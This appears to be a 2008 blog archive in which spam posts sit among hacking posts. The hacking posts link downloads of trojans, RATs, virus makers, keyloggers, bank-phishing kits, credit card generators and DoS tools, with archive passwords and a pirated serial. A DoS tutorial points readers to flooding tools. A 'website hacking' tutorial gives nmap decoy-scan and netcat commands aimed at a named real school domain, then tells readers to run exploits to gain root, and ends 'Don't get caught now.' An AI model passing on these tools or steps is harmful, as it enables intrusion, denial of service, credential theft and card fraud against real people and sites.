Carlsberg Launches Web TV for Football Fans

Posted at Wednesday, December 10, 2008


From many years ago that all people can watch football sport from television. Football is sport that very interesting for all people in the world. Television broadcast football match from many league from many country. Now there is new option for you to watching clips of the football match through Internet named Web-TV. Recently Carlsberg Brewery launched a football web-TV-channel about football and fan life: Partofthegame.tv. This Web-TV as new TV concept for passionate football fans sets the direction for the future of television to engage passionate club fans across the world. If you interest with Carlsberg web-tv please click : www.partofthegame.tv.

Hacker's Tool Set (45 Hacking Tools)

Posted at Monday, December 08, 2008

Hacker's Tool Set (45 Hacking Tools)

try them idk i just found these

IMC Grahams Trojan
• IMC Ice Dragon
• Myspace Password Cracker
• IMC Myspace Phisher
• Ultra Surf
• Rapid Share Account Gen
• MSN Nudge Madness
• Ice Reloaded MSN Freezer
• IMC Handbook
• BrutusAE2
• Lord PS


• Hoax Toolbox
• IMC Word List
• Blues Port Scanner
• Bandook RAT v1.35
• Project Satan 2.0
• EES binder v1.0
• File Injector v3
• Remote Desktop Spy v4.0
• Passive Terror v1.3 Final Edition
• Dyn-DL (Dynamic downloader)
• Silent Assassin v2.0
• Net Scan Tools v4.2
• Rocket v1.0
• NStealth HTTP Security Scanner v5.8
• Attack Toolkit v4.1 & source code included
• Legion NetBios Scanner v2.1
• Battle Pong
• TeraBIT Virus Maker v2.8
• p0kes WormGen 2.0
• JPS Virus Maker
• IRC Ban Protection
• IRC Mega Flooder
• FTP Brute Hacker
• RAR Password Cracker
• Vbulletin 3.6.5 Sql Injection Exploit
• IPB 2-2.1.5 Sql Injection Exploit
• IPB 2-2.1.7 Exploit
• Cain & Abel v4.9.3
• NetStumbler 0.4.0
• Cryptor 1.2
• VNC Crack
• Hamachi 0.9.9.9
• pbnj-1.0
• Mutilate File Wiper 2.92

http://rapidshare.com/files/34738681/IMC...t.zip.html


AIO_Wireless_Hack_Toolz
Code:
http://www.mediafire.com/?azm5mmz5y3f (14.84 MB)

ALL IN ONE HACKER'S N33D 2006-Hackman
Code:
http://www.mediafire.com/?azyudyyeimy (58.63 MB)

UltraHacker 156 in 1

95-ME Keygen.rar
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I - Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
f*ck Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
PHPfucker.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth - HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip

donlot:
http://www.sendspace.com/file/fk433s


Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 150+ tools it is a great collection of useful tools for network users. The size of Net Tools 4.5.74 is approximately 25 Mb.

Contents

Net Tools 4.5 (build 74) contains a whole variety of network tools. Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) Extra Tools (nmap console & win32 version)

http://rapidshare.com/files/50211300/Net....0.171.zip


Hack Tools
http://rapidshare.com/files/53227068/Htool.part1.rar
http://rapidshare.com/files/53230471/Htool.part2.rar

Rapidshare hackers
http://rapidshare.com/files/43093441/rha...wnload.rar
pass: mechodownload

MSN HACK
http://rapidshare.com/files/38797836/Msn...er.com.rar

PC HACKING
http://rapidshare.com/files/20414134/PC_...sameer.rar

Password Hacking AIO
http://rapidshare.com/files/15144318/Pas...ng_AIO.rar

Sub7 For Experts
!!Download Ultimate Hcking Tool "Sub7 legends"!!!!
Not for beginners!!!!! use carefully!!! Tutorial provided inside zip

password: 123456

click to get
http://www.filefactory.com/file/8207bf

Yahoo Booter!!
YAHOO BOOTER
http://rapidshare.com/files/55825962/Col...ll.zip.htm

1) Double click the .exe file. Labeled "Colts 1Bot YaHell.exe". A window containing the main forum labeled "Colts 1Bot YaHell" should pop up.

2) Now we need to enter the bot name in the label titled "Y! Name" and the password into the label titled "Y! Pass"

3) Pretty much self explanitory...hit the "login button"

4) Now you type your nameyou want to boot into the label titled "Lamer" and choose one of your three booting options. Which include PM Bomb, Imv Bomb, and Buzz Bomb

Yahoo Magic Pass
use this one really easy

mAgic Password |Sender
http://rapidshare.com/files/56051314/mps7.zip.html

working

http://www.imagehosting.com/show.php/1144544_1.jpg.html

http://www.imagehosting.com/show.php/1144549_2.jpg.html


http://www.imagehosting.com/show.php/1144553_3.jpg.

Perfect Keylogger
If u visited our website u'll hav located by urself....

Perfect Keylogger
javascript:void(0);
submit
http://rapidshare.com/files/57868957/i_bpk2003.exe.html

username:::::: syk071c
serial key::::::: TLAM-GYUQ-JYCI-SLUO


more more tools

DHC hacking Tools AIO

image
http://img174.imageshack.us/img174/3531/toolzoj6.jpg

Contents:

1. Ddoz Toolz
2. SQL Injection
3. CC [ Credit Card ]
4. IRC Attacking
5. Google Hacker
6. RapidShare Hack Code

download:
http://rapidshare.com/files/81139182/DHC...berbot.rar

Full Hack Pack 2008


Full hack pack for everything you need Rapidshare , Hack msn , Windows Hacks , Paypal, Ebay, E-mail, Servers, Passwords Pass, Remote shutdown , Ultra Dos, Bios pass remover, Etc...

download

http://rapidshare.com/files/102416994/Wa....part1.rar

http://rapidshare.com/files/102416995/Wa....part2.rar

http://rapidshare.com/files/102416996/Wa....part3.rar

http://rapidshare.com/files/102490404/Wa....part4.rar

http://rapidshare.com/files/102490403/Wa....part5.rar

http://rapidshare.com/files/102490402/Wa....part6.rar

Passw : SharkMan

net tools

image
http://megauploader.org/out.php/i1982_ntscreenshot2.JPG

The Creation

Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.

Contents

Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)


Many extra features and utilities are included in this package!

http://mabsoft.com/NetTools5.0.70.zip

Yahoo tools AIO

included:
* Password Decrypter2k 1.0
* Yahoo Avatar Hack
* Yahoo Delete me
* Y!Message Archive Decoder
* Yahoo New Sounds
* Yahoo Rapid Make Mail
* Yahoo Webcam Acces
* Yahoo Magic Avatar
* Yahoo Monitor
* Yahoo Spy
* Yahoo Winamp
* AlphaTool v4.2
* DarkYahoo-Unlocker
* Deny a Dork
* KrazyZ Tools v1
* Super Y!
* Yahoo Link SORRY v1
* Yahoo World v1
* Yahoo Unbanner
* Yahoo PRO
* SpyNick v3
* Messenger Monitor
* Hot Tools 1.0
* Ydaze pc v2
* Shanes Account UnBanner

http://rapidshare.com/files/144228434/Yahtools.rar

enjoy lol!!!!!!!!!!!!!!

Buy Online Xylitol and Erythritol at EmeraldForestXylitol.com

Posted at Saturday, December 06, 2008

There are two sweeteners that are considered to be relatively safe and healthy for your body: Xylitol and Erythritol. These are natural sugar alcohol and if you want to know why it's widely considered the better sweeteners to put into your body, just take a look at the information page on it available at www.emeraldforestxylitol.com/guide_xylitol.htm. Among other helpful information, that page lets you know that: "It is 70% as sweet as table sugar yet it is virtually non-caloric, does not affect blood sugar, does not cause tooth decay, and is absorbed by the body, therefore unlikely to cause gastric side effects unlike other sugar alcohols." So, it's got the good stuff that you want from your artificial sweetener without many of the bad side effects.

Erythritol is white crystalline powder that is oderless and has a clean sweet taste that is similar to sucrose. It is approximately 70% as sweet as sugar and flows easily due to its nonhygroscopic nature. This natural sweetener has been a part of the human diet for thousands of years due to its presence in fruits such as pears, melons, and grapes as well as other foods such as mushrooms, wine, cheese, and soy sauce. Since 1990, erythritol has been commercially produced and added to foods and beverages to provide sweetness as well as enhancing food taste and texture.

Xylitol is a naturally occurring sweetener primarily derived from plant sources and has many surprising benefits. Xylitol is not actually a sugar, it's a sugar alcohol. Other sugar alcohols include erythritol, maltitol and sorbitol. Unlike other sugars it has five, not six, carbon atoms. Classified as a low calorie (2.4 calories per gram), low carbohydrate natural sweetener, xylitol is considered beneficial for your teeth and completely safe for diabetics. It has no toxicity and has not been linked to any form of disease. If you want to buy xylitol and Erythritol it's available on EmeraldForestXylitol.com that offers purchase online. Emerald Forest produces natural products sweeten with xylitol, and erythritol, as well as bulk packaging of natural sweeteners. Emerald Forest committed to producing natural, healthy products that make use of sweeteners that are both diabetic safe, and low in calories.

DoS Tutorial

Posted at Sunday, November 09, 2008

DoS Tutorial

Contents:
I………………………………………………….What is it?
II…………………………………………………How does it work?
III………………………………………………What will I need?
IV………………………………………………Common miss-understandings…


Section I:
What is it?

Well DoS (Denial of Service) is an attempt to make a computer resource unavailable to its intended users. Trust me wikkipedia said it. In other words it is an attempt to make a site or service un-available or non-existent. There are a lot of DoS attempts on this site. It is generally easy to block if it is just one IP for example. But recently there have been a large group of people from all over the world that and all the genuine traffic on a Saturday evening will slow the servers.

Section II:
How does it work?

It works by sending lots of connection requests to a website or service. Then this means the server is over loaded and starts running slow. Therefore the real traffic cannot connect. This is by far the easiest attack you can do on a site. And there are many tools available to DoS an IP.

Section III:
What will I need?
You will either need programming knowledge suitable to program your own DoS attack OR one of these.

http://www.megaupload.com/?d=NGO2W3LG

http://rapidshare.com/files/104926676/LOIC.exe Low Orbit Ion Cannon

http://rs84.rapidshare.com/files/40856215/DDOS.rar

Password: canvas

Includes:
• NetBotAtt14En
• Click v2.2
• Spoofed IRC Nuker v1.3
• Hartz4Flooder v0.2
• Bitslap
• Crazyping v1.1
• Killme v1.0
• Bd0rk's DoS killer
• Krate port bomber
• Fed up v2.0
• Gimp
• Muerte v2.1
• Kaput v1.0 & beta v1.5
• Donut http flooder v1.4
• Blood lust
• Hospitables nuker v2.2
• Bitchslap v1.0
• Razors DoS tool v1.1
• Try2DdoS
• Firewall killer v1.3
• Death n destruction
• Assault v1.0
• NetBot Attacker v1.4 English
• Panteher v2.0
• Battle Pong
• Nemesy v1.3
• Meliksah nuke v2.5
• Inferno Nuker
• Rocket v1.0
• Igmp nuke v1.0

Section IV:
Common miss-understandings…
1) 32 bytes of data will not take down a website!
2) One computer is unlikely to have much effect on a server.
3) This does not work on Google
4) Or FBI main site

A Faster Start to Become A Hacker

Posted at Sunday, November 09, 2008

A Faster Start to Become A Hacker

If you are serous about hacking and dont
know were to start then i think this is for you...

Its called Backtrack 3 final

Download backtrack3final.iso you will need a high speed internet connection to download this file

Watch this Video tutorial and make your self a backtrack3final.iso boot able disk

Now that you have your boot able Iso disk you need to put the disk into your cd drive and restart your computer. If you are with me so far then you will see this boot menu

You will need to pick the correct boot option... what boot option works on your computer this is up to you to figure out for your self... just simply press the up or down key and press enter... My labtop will only boot up with the (VESA KDE) option...

Now if backtrack boots up with no errors then you should see something like this

If at any time you see this screen then you need to enter these 3 commands
root
toor
startx




Website Hacking Tutorial

Posted at Sunday, November 09, 2008

Website Hacking Tutorial

*post a comment if you like it, or if there is something wrong.

First, you want to find out as much about it as you can. So, first, you want to port scan it with nmap (I think its the best port scanner)
-----------------------------------------------------------------------
nmap -PN -sS http://www.siteyouwanttohackgoeshere.xxx -p 1-1000 -r -A -D randomdecoyip
-----------------------------------------------------------------------
So, my example would be.
-----------------------------------------------------------------------
nmap -PN -sS http://www.mchs.gsacrd.ab.ca -p 1-1000 -r -A -D 156.164.25.734
-----------------------------------------------------------------------
nmap - Needs to be there tongue.gif
-PN - stops the ping
-sS - Scans for ports
-p 1-1000 - The ports to scan
-r - Makes the scan scan the ports in order
-sV - Shows what is running on the ports
-O - What opperating system is running
-D - Decoy scan

So, then you should get something like this.
-----------------------------------------------------------------------
C:\Documents and Settings\Captian falcon\Desktop\Tools\Reconnaissance\nmap-4.68>
nmap -PN -sS http://www.mchs.gsacrd.ab.ca -p 1-1000 -r -sV -O -D http://www.mchs.gsacrd.ab.ca

Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-01 20:56 Mountain Daylight Tim
e
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 20:57 (0:00:17 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 20:57 (0:00:17 remaining)
Interesting ports on gsacrd.ab.ca (199.216.233.173):
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp closed smtp
80/tcp open http Apache httpd 1.3.41 ((Darwin) mod_ssl/2.8.31 OpenSSL/0.9.
7l PHP/4.4.8)
110/tcp closed pop3
443/tcp closed https
510/tcp closed fcp
548/tcp open afp Apple AFP (name: Document Server; protocol 3.2; Max OS X
10.4/10.5)
Device type: general purpose
Running: Apple Mac OS X 10.4.X
OS details: Apple Mac OS X 10.4.8 - 10.4.11 (Tiger) (Darwin 8.8.0 - 8.11.1)

OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.844 seconds
------------------------------------------------------------------------
Sometimes, it will say that the site is down, if so, put the -P0 at the end (Its a 0 not a o)
So the example would be.
------------------------------------------------------------------------
nmap -PN -sS http://www.mchs.gsacrd.ab.ca -p 1-1000 -r -sV -O -D http://www.mchs.gsacrd.ab.ca -P0
-----------------------------------------------------------------------


Alright, now, say that the site has a firewall, so that would mean, that your scan would say 0 open ports sad.gif
But, don't worry. It is still possable to get into the site.

So, next thing you need to do is download netcat
Then, type this
--------------------------------------------------------------------------------------------------------------------------------------
nc -vv http://www.mchs.gsacrd.ab.ca 80
--------------------------------------------------------------------------------------------------------------------------------------

Then, when something pops up, you may need to type
--------------------------------------------------------------------------------------------------------------------------------------
GET test
--------------------------------------------------------------------------------------------------------------------------------------
Then, you should get something like this.

--------------------------------------------------------------------------------------------------------------------------------------
C:\Documents and Settings\Captian falcon\Desktop\Tools\Backdoor Apps\NETCAT>nc -
vv http://www.mchs.gsacrd.ab.ca 80
DNS fwd/rev mismatch: docs.mchs.gsacrd.ab.ca != gsacrd.ab.ca
docs.mchs.gsacrd.ab.ca [199.216.233.173] 80 (http) open
GET test


400 Bad Request

Bad Request


Your browser sent a request that this server could not understand.


Invalid URI in request GET test




Apache/1.3.41 Server at http://www.mchs.gsacrd.ab.ca Port 80


sent 9, rcvd 328: NOTSOCK
--------------------------------------------------------------------------------------------------------------------------------------


Finally, we have most of what we need.


Next, we telnet to all of the open ports (If you get any)
So, if I were to telnet to the open ports, I would get (Say im telneting to port 22.
---------------------------------------------Port22---------------------------------------------------------------------------------
SSH-2.0-OpenSSH_4.7
--------------------------------------------------------------------------------------------------------------------------------------

So, to search for the exploit, I would search SSH then (Ctrl+F) 2.0
I would do that for every port I could find open.

Then, look for some exploits for the server type.
To do that, you would search for the server type and version.
MY example would be.
--------------------------------------------------------------------------------------------------------------------------------------
Apache
--------------------------------------------------------------------------------------------------------------------------------------
Then, (ctrl+f) 1.3.41
Then, edit the exploit so that it works onto your site (The one you are hacking) then compile the exploit, run it.

And, if you get a good exploit, you will get into the root of the website, and be able to edit any part of the site you want.
The sky is the limit.

--------------------------------------------------------------------------------------------------------------------------------------
Video download link
http://rapidshare.com/files/134232854/Ho...e.wmv.html
--------------------------------------------------------------------------------------------------------------------------------------

Don't get caught now.

--------------------------------------------------------------------------------------------------------------------------------------
For Nmap
http://nmap.org/download.html

For Netcat
http://sourceforge.net/project/showfiles..._id=209191

For exploits
http://www.milw0rm.com

Easy Process, Fast Funding and Excellent Service Business Loan

Posted at Tuesday, October 21, 2008

